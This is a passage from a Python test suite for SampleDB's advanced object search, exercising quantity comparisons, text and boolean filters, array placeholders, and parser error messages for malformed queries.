filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm < 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr < 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm < quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm < quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_greater_than(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm > 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm > 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm > quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm > quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_less_than_equals(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm <= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm <= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr <= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1 <= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_quantity_greater_than_equals(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'quantity_attr': {
'_type': 'quantity',
'units': 'cm',
'dimensionality': '[length]',
'magnitude_in_base_units': 0.01
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm >= 2cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm >= 1cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr >= 0.5cm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('2cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('1cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('0.5cm >= quantity_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_text_contains(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ample" in "example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ampel" in "example"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ample" in text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"ampel" in text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_text_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'text_attr': {
'_type': 'text',
'text': 'This is an example.'
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"This is an example." == text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"This is an example!" == text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "This is an example."', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "This is an example!"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_attribute_equal(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
},
'bool_attr2': {
'_type': 'bool',
'value': True
},
'bool_attr3': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == bool_attr2', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr2 == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr == bool_attr3', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr3 == bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_expression_equal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and True) == (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) == (True and False)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(True and False) == (True and True)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 0
def test_find_by_boolean_not(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not False', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'This expression will always be true', 0, 9)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'This expression will always be false', 0, 8)]
def test_find_by_attribute_not(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('!(not bool_attr)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['bool_attr']['value']
def test_find_by_array_item(user, action) -> None:
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'array_attr': [
{
'text_attr': {
'_type': 'text',
'text': 'Example'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
},
{
'text_attr': {
'_type': 'text',
'text': 'Test'
},
'bool_attr': {
'_type': 'bool',
'value': False
}
}
]
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
data = {
'name': {
'_type': 'text',
'text': 'Name'
},
'array_attr': [
{
'text_attr': {
'_type': 'text',
'text': 'Example'
},
'bool_attr': {
'_type': 'bool',
'value': True
}
}
]
}
sampledb.logic.objects.create_object(action_id=action.id, data=data, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('"est" in array_attr.?.text_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert "est" in object.data['array_attr'][1]['text_attr']['text']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.text_attr = "Test"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert object.data['array_attr'][1]['text_attr']['text'] == 'Test'
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert len(search_notes) == 0
for object in objects:
assert not object.data['array_attr'][1]['bool_attr']['value']
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 2
assert len(search_notes) == 0
for object in objects:
assert any(o['bool_attr']['value'] for o in object.data['array_attr'])
def test_find_by_unknown_binary_operation(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('False and 2018-10-11', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown binary operation", 0, len('False and 2018-10-11'))
def test_find_by_unknown_unary_operation(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not 2018-10-11', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not 2018-10-11'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not 1mm', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not 1mm'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not "Test"', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unknown unary operation", 0, len('not "Test"'))
def test_find_by_mutliple_array_placeholders(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.bool_attr and array_attr.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Multiple array placeholders", 0, len('array_attr.?.bool_attr and array_attr.?.bool_attr'))
def test_find_by_invalid_array_placeholder(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.?.?.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Multiple array placeholders", 0, len('array_attr.?.?.bool_attr'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('array_attr.??.bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid array placeholder", 0, len('array_attr.??.bool_attr'))
def test_find_by_invalid_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('åttr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unable to parse literal", 0, len('åttr'))
def test_find_by_invalid_attribute_name(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('aåttr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid attribute name", 0, len('aåttr'))
def test_find_by_invalid_units(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('quantity_attr > 1 Banana', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unable to parse units", len('quantity_attr > 1'), len('quantity_attr > 1 Banana'))
def test_find_by_invalid_tag(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('#tåg', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid tag", 1, len('#tåg'))
def test_find_by_unfinished_text(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('text_attr == "', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unfinished text", len('text_attr == '), len('text_attr == "'))
def test_find_by_unbalanced_parentheses(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('(bool_attr', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unmatched opening parenthesis", 0, 1)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('bool_attr)', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unmatched closing parenthesis", len('bool_attr'), len('bool_attr)'))
def test_find_by_invalid_operands(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('and True', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Binary operator without left operand", 0, len('and'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('True and', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Binary operator without right operand", len('True '), len('True and'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Unary operator without operand", 0, len('not'))
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('not and', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert len(search_notes) == 1
assert search_notes[0] == ('error', "Invalid right operand", 0, len('not and'))
def test_find_by_different_dimensionalities(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm == 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm != 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 1
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm > 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm < 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm >= 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
filter_func, search_tree, use_advanced_search = sampledb.logic.object_search.generate_filter_func('20mm <= 20l', use_advanced_search=True)
filter_func, search_notes = sampledb.logic.object_search.wrap_filter_func(filter_func)
objects = sampledb.logic.objects.get_objects(filter_func=filter_func)
assert len(objects) == 0
assert search_notes == [('warning', 'Invalid comparison between quantities of different dimensionalities', 0, None)]
def test_find_by_boolean_literal(user, action) -> None:
sampledb.logic.objects.create_object(action_id=action.id, data={
'name': {
'_type': 'text',
'text': 'Name'
}
}, user_id=user.id)
